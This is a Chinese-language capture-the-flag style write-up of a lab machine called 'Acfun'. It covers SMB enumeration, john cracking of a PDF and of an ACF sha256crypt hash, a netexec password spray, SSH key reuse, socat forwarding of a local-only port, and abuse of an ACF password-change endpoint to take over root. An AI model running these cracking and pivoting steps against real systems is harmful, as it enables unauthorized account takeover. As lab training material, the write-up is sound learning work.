扫描┌──(root㉿kali)-[/home/kali1] └─# nmap -A 192.168.245.136 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-15 20:43 CST Nmap scan report for 192.168.245.136 Host is up (0.00017s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 10.0 (protocol 2.0) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.21.9 (workgroup: WORKGROUP) MAC Address: 00:0C:29:3E:D5:2F (VMware) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: Host: ACFUN Host script results: |_nbstat: NetBIOS name: ACFUN, NetBIOS user: unknown, NetBIOS MAC: unknown (unknown) | smb2-time: | date: 2026-06-15T12:43:39 |_ start_date: N/A |_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows 6.1 (Samba 4.21.9) | Computer name: localhost | NetBIOS computer name: ACFUN\x00 | Domain name: | FQDN: localhost |_ System time: 2026-06-15T20:43:3908:00 TRACEROUTE HOP RTT ADDRESS 1 0.17 ms 192.168.245.136 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.90 seconds可以发现有一个smb的共享端口直接访问smb就可以得到一个pdf文件这个文件的内容记载了一些acfun相关的资料得到一个pdf文件但是进行了加密下面是解密步骤首先使用pdf2john查看加密的算法是什么提取该pdf的哈希值┌──(root㉿kali)-[/home/kali1] └─# pdf2john ACF_Framework_Internal_Guide.pdf ACF_Framework_Internal_Guide.pdf:$pdf$2*3*128*2147483644*1*16*eaf858bf9a202826f048f9e8927c33c0*32*b638e2822a306edc2e0d5f04c4fd0ef000000000000000000000000000000000*32*3863fe1ffbc881b421b301c8c0cd614a0c9bb69ed8341f042a3348c507d3a522之后可以使用john进行爆破┌──(root㉿kali)-[/home/kali1] └─# john --wordlist/usr/share/wordlists/rockyou.txt pdf_hash.txt Created directory: /root/.john Using default input encoding: UTF-8 Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64]) Cost 1 (revision) is 3 for all loaded hashes Will run 2 OpenMP threads Press q or Ctrl-C to abort, almost any other key for status 1234567890 (?) 1g 0:00:00:00 DONE (2026-04-27 21:58) 100.0g/s 6400p/s 6400c/s 6400C/s 123456..charlie Use the --show --formatPDF options to display all of the cracked passwords reliably Session completed.看了一下其实没什么太多信息有这个文件信息之后可以猜测这个服务器的功能。既然是smb服务那么可以使用enum4linux-ng进行信息枚举┌──(root㉿kali)-[/home/kali1] └─# enum4linux-ng -A 192.168.245.136 ENUM4LINUX - next generation (v1.3.10) | Target Information | [*] Target ........... 192.168.245.136 [*] Username ......... [*] Random Username .. vnqvwqyx [*] Password ......... [*] Timeout .......... 10 second(s) | Listener Scan on 192.168.245.136 | [*] Checking LDAP [-] Could not connect to LDAP on 389/tcp: connection refused [*] Checking LDAPS [-] Could not connect to LDAPS on 636/tcp: connection refused [*] Checking SMB [] SMB is accessible on 445/tcp [*] Checking SMB over NetBIOS [] SMB over NetBIOS is accessible on 139/tcp | NetBIOS Names and Workgroup/Domain for 192.168.245.136 | [] Got domain/workgroup name: WORKGROUP [] Full NetBIOS names information: - ACFUN 00 - B ACTIVE Workstation Service - ACFUN 03 - B ACTIVE Messenger Service - ACFUN 20 - B ACTIVE File Server Service - WORKGROUP 00 - GROUP B ACTIVE Domain/Workgroup Name - WORKGROUP 1e - GROUP B ACTIVE Browser Service Elections - MAC Address 00-00-00-00-00-00 | SMB Dialect Check on 192.168.245.136 | [*] Trying on 445/tcp [] Supported dialects and settings: Supported dialects: SMB 1.0: true SMB 2.0.2: true SMB 2.1: true SMB 3.0: true SMB 3.1.1: true Preferred dialect: SMB 3.0 SMB1 only: false SMB signing required: false | Domain Information via SMB session for 192.168.245.136 | [*] Enumerating via unauthenticated SMB session on 445/tcp [] Found domain information via SMB NetBIOS computer name: ACFUN NetBIOS domain name: DNS domain: FQDN: localhost Derived membership: workgroup member Derived domain: unknown | RPC Session Check on 192.168.245.136 | [*] Check for anonymous access (null session) [] Server allows authentication via username and password #这里则表示允许空用户或者空密码进行登录。这意味着无需任何凭证就能够链接上这个smb服务器 [*] Check for guest access [] Server allows authentication via username vnqvwqyx and password [H] Rerunning enumeration with user vnqvwqyx might give more results | Domain Information via RPC for 192.168.245.136 | [] Domain: WORKGROUP [] Domain SID: NULL SID [] Membership: workgroup member | OS Information via RPC for 192.168.245.136 | [*] Enumerating via unauthenticated SMB session on 445/tcp [] Found OS information via SMB [*] Enumerating via srvinfo [] Found OS information via srvinfo [] After merging OS information we have the following result: OS: Linux/Unix (Samba 4.21.9) OS version: 6.1 OS release: OS build: 0 Native OS: Windows 6.1 Native LAN manager: Samba 4.21.9 Platform id: 500 Server type: 0x809a03 Server type string: Wk Sv PrQ Unx NT SNT Samba Server | Users via RPC on 192.168.245.136 | [*] Enumerating users via querydispinfo [] Found 1 user(s) via querydispinfo [*] Enumerating users via enumdomusers [] Found 1 user(s) via enumdomusers [] After merging user results we have 1 user(s) total: 1000: username: leaf #发现一个普通用户leaf name: acb: 0x00000010 #这个状态表明这个用户需要凭证密码才能够登录 description: | Groups via RPC on 192.168.245.136 | [*] Enumerating local groups [] Found 0 group(s) via enumalsgroups domain [*] Enumerating builtin groups [] Found 0 group(s) via enumalsgroups builtin [*] Enumerating domain groups [] Found 0 group(s) via enumdomgroups | Shares via RPC on 192.168.245.136 | [*] Enumerating shares [] Found 2 share(s): #发现的两个共享文件夹 IPC$: comment: IPC Service (Samba Server) type: IPC public: comment: type: Disk [*] Testing share IPC$ [] Mapping: OK, Listing: NOT SUPPORTED [*] Testing share public [] Mapping: OK, Listing: OK | Policies via RPC for 192.168.245.136 | [*] Trying port 445/tcp [] Found policy: Domain password information: Password history length: None Minimum password length: 5 #弱密码策略 Minimum password age: none Maximum password age: 49710 days (136 years) 6 hours 21 minutes Password properties: - DOMAIN_PASSWORD_COMPLEX: false # - DOMAIN_PASSWORD_NO_ANON_CHANGE: false - DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false - DOMAIN_PASSWORD_LOCKOUT_ADMINS: false - DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false - DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false Domain lockout information: Lockout observation window: 30 minutes Lockout duration: 30 minutes Lockout threshold: None Domain logoff information: Force logoff time: 49710 days (136 years) 6 hours 21 minutes | Printers via RPC for 192.168.245.136 | [] No printers returned (this is not an error)这里扫描出来大概就是说了关于smb服务的密码策略以及得到了一个用户名为leaf。然后可以通过这个用户名进行爆破尝试这里使用netexec工具尝试──(kali1㉿kali)-[~] └─$ netexec smb 192.168.245.136 -u leaf -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding SMB 192.168.245.136 445 ACFUN [*] Unix - Samba (name:ACFUN) (domain:ACFUN) (signing:False) (SMBv1:True) (Null Auth:True) SMB 192.168.245.136 445 ACFUN [-] ACFUN\leaf:123456 STATUS_LOGON_FAILURE SMB 192.168.245.136 445 ACFUN [-] ACFUN\leaf:12345 STATUS_LOGON_FAILURE SMB 192.168.245.136 445 ACFUN [-] ACFUN\leaf:123456789 STATUS_LOGON_FAILURE SMB 192.168.245.136 445 ACFUN [-] ACFUN\leaf:password STATUS_LOGON_FAILURE登录smb然后将公钥传上去登录服务器上来之后可以看到还有个用户叫做xueli的用户这个用户的话额说实话我看了wp才知道和leaf用的是一个私钥。第一次被阴到了哈哈尝试sudo -l查看SUID但是需要密码wget https://github.com/jingjingxyk/build-static-socat/releases/download/v2.5.0/socat-1.8.1.1-linux-x64.tar.xz tar -xvf *.xz ./socat TCP4-LISTEN:8080,fork,reuseaddr TCP4:127.0.0.1:443这里再用ps尝试一下就会发现有个httpd服务运行着然后看一下端口链接情况可以看到有一个443端口在本地服务器地址上。这里可以尝试用curl或者wget来看看这个页面是否可以访问额好像是 wget -qO --no-check-certificate https://所以外部是访问不到这个443端口的所以我们需要一个能够将本地端口流量映射到外部能访问的。我这里用socatwget https://github.com/jingjingxyk/build-static-socat/releases/download/v2.5.0/socat-1.8.1.1-linux-x64.tar.xz tar -xvf *.xz ./socat TCP4-LISTEN:8080,fork,reuseaddr TCP4:127.0.0.1:443这样就能在外部就能够通过8080端口访问到内部的443端口了用leaf私钥登录到xueli用户上你可以查看服务器上的/etc/acf/passwd文件这个文件中存放的是acf的后台管理控制台密码但是这个密码并不是和本地系统上的root密码acf的架构会将web系统的用户与本地系统的用户进行隔离。​​​​​详解ACFAlpine Linux轻量Web配置框架_linux_vortex5-openEuler 社区可以通过这个网站了解xueliAcfun:~$ cat /etc/acf/passwd root:$5$rDkGkMAvv6FPpwRG$.gS5I9LcOiZDYGW598cgXDPEDvHI7GLl.UmVxgdyUQ0:Admin account:ADMIN而acf存放用户的账户密码其中密码是通过sha256进行加密所以我们这里可以用john一款专注于爆破系统密码的工具进行爆破┌──(kali1㉿kali)-[~] └─$ sudo john --formatsha256crypt --wordlist/usr/share/wordlists/rockyou.txt 1 Created directory: /root/.john Using default input encoding: UTF-8 Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 512/512 AVX512BW 16x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 2 OpenMP threads Press q or Ctrl-C to abort, almost any other key for status juggernaut (root) 1g 0:00:00:05 DONE (2026-06-24 11:15) 0.1930g/s 12651p/s 12651c/s 12651C/s sactown..ryanscott Use the --show option to display all of the cracked passwords reliably Session completed.登录上来之后emm后面的话核心就是代码审计以及你对web后端代码的架构理解我对于代码审计说实话不是很会所以直接丢ai。大概就是你需要从后端代码中找出那个刻意的漏洞然后你需要访问这个漏洞的接口从而实现提权。xueliAcfun:/usr/share/acf/app$ ls -al total 100 drwxr-xr-x 5 root root 4096 Apr 26 13:56 . drwxr-xr-x 5 root root 4096 Apr 26 13:56 .. drwxr-xr-x 2 root root 4096 Apr 26 13:56 acf-util -rw-r--r-- 1 root root 1811 Nov 25 2024 acf_cli-controller.lua -rw-r--r-- 1 root root 26283 Nov 25 2024 acf_www-controller.lua drwxr-xr-x 2 root root 4096 Apr 26 13:56 alpine-baselayout drwxr-xr-x 2 root root 4096 Apr 26 13:56 apk-tools -rw-r--r-- 1 root root 905 Nov 25 2024 debug-html.lsp -rw-r--r-- 1 root root 1215 Nov 25 2024 dispatcherror-html.lsp -rw-r--r-- 1 root root 1150 Nov 25 2024 exception-html.lsp -rw-r--r-- 1 root root 422 Nov 25 2024 expert-html.lsp -rw-r--r-- 1 root root 1894 Nov 25 2024 filedetails-html.lsp -rw-r--r-- 1 root root 1015 Nov 25 2024 logfile-html.lsp -rw-r--r-- 1 root root 446 Nov 25 2024 menuhints.menu -rw-r--r-- 1 root root 1777 Nov 25 2024 status-html.lsp -rw-r--r-- 1 root root 4815 Nov 25 2024 template-html.lsp -rw-r--r-- 1 root root 241 Nov 25 2024 template-json.lsp -rw-r--r-- 1 root root 772 Nov 25 2024 template-stream.lsp xueliAcfun:/usr/share/acf/app$ pwd /usr/share/acf/app这里为什么说刻意呢主要是我觉得这个漏洞比较草率吧emm就是一般如果正常情况下不会有这个代码吧因为毕竟都说了acf这个架构说是与系统账户隔离啊但是我还可以通过acf管理来直接修改root的密码这就很emm有点说不通。当然这只是我的推测而已我也不知道他到底是不是本来就有这个漏洞。这个目录下的alpine-baselayout目录中包含了所有关于登录之后的操作后端代码其中passwd-model.lua和passwd-controller.lua是关于密码处理的。xueliAcfun:/usr/share/acf/app/alpine-baselayout$ ls -al |grep pas -rw-r--r-- 1 root root 284 Jun 28 2023 password-controller.lua -rw-r--r-- 1 root root 1562 Jun 28 2023 password-model.lua第一个文件中大概就是用户处理一些客户端提交上来的数据。第二个文件中的内容关键一些简单来说就是他会处理修改的用户是否存在与系统中如果存在你的密码长度是否符合如果都完成了则将你的密码进行重新加密之后替换掉系统的/etc/shadow文件中的密码。也就是说根据这两个内容我们就能够确定这个acf其实可以直接修改掉系统内的用户密码。但是我们并不知道这个修改系统内部用户密码的接口在哪里虽然我们知道这个后端代码lua是咋写的但是并没有他的接口调用。问ai让ai找路径得到​​​​​​https://192.168.245.136:1234/cgi-bin/acf/alpine-baselayout/password/editai是这样说的大概分为3个步骤。第一步拆解核心路由器的“规则”看 acf_www-controller.luaself.conf.prefix, self.conf.controller, self.conf.action self.parse_path_info(ENV[PATH_INFO])所以URL的框架为/基础CGI入口/ prefix / controller / action┌──(kali1㉿kali)-[~] └─$ ssh root192.168.245.136 root192.168.245.136s password: _ __ _____| | ___ ___ _ __ ___ ___ \ \ /\ / / _ \ |/ __/ _ \| _ _ \ / _ \ \ V V / __/ | (_| (_) | | | | | | __/ \_/\_/ \___|_|\___\___/|_| |_| |_|\___| rootAcfun:~# ls -al total 20 drwx------ 3 root root 4096 Apr 26 14:18 . drwxr-xr-x 21 root root 4096 Apr 26 16:10 .. lrwxrwxrwx 1 root root 9 Feb 25 17:00 .bash_history - /dev/null drwx------ 2 root root 4096 Apr 26 01:12 .ssh -rw-r--r-- 1 root root 11 Apr 26 14:18 acf.pass -rw-r--r-- 1 root root 44 Apr 26 15:54 root.txt